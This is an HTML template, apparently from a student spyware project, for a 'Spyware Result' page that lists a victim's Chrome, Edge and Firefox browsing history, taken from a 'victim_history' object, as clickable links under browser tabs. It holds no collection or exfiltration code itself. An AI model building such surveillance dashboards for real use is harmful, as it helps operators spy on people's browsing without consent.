<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Spyware Result - History</title>
    <link rel="stylesheet" href="/static/history.css">
</head>
<body>
    <div class="container">
      {% include '_sidebar.html' %}   <!-- atau bisa ditempel manual -->

        <main class="history">
            <div class="history-header">
                <h1 class="page-title">Spyware Result</h1>
            </div>
            <div class="history-tabs">
                <button class="tab-button" onclick="showLinks('chrome')">Google Chrome</button>
                <button class="tab-button" onclick="showLinks('edge')">Microsoft Edge</button>
                <button class="tab-button" onclick="showLinks('firefox')">Firefox</button>
            </div>

            <div class="history-grid">
                <section class="history-section" id="chrome-links" style="display:none;">
                    <h2>Google Chrome</h2>
                    <div class="history-links">
                        <ul>
                            {% for link in victim_history.chrome_history.split("\n") %}
                                <li><a href="{{ link }}" target="_blank">{{ link }}</a></li>
                            {% endfor %}
                        </ul>
                    </div>
                </section>

                <section class="history-section" id="edge-links" style="display:none;">
                    <h2>Microsoft Edge</h2>
                    <div class="history-links">
                        <ul>
                            {% for link in victim_history.edge_history.split("\n") %}
                                <li><a href="{{ link }}" target="_blank">{{ link }}</a></li>
                            {% endfor %}
                        </ul>
                    </div>
                </section>

                <section class="history-section" id="firefox-links" style="display:none;">
                    <h2>Firefox</h2>
                    <div class="history-links">
                        <ul>
                            {% for link in victim_history.firefox_history.split("\n") %}
                                <li><a href="{{ link }}" target="_blank">{{ link }}</a></li>
                            {% endfor %}
                        </ul>
                    </div>
                </section>
            </div>
        </main>
    </div>
    
    <div class="logo">
                <img src="/static/image/Logo PBL.png" alt="FBL Logo">
            </div>
        </div>
    </div>

    <script>
        function showLinks(browser) {
            document.getElementById('chrome-links').style.display = 'none';
            document.getElementById('edge-links').style.display = 'none';
            document.getElementById('firefox-links').style.display = 'none';
            
            document.getElementById(browser + '-links').style.display = 'block';
        }
    </script>
</body>
</html>
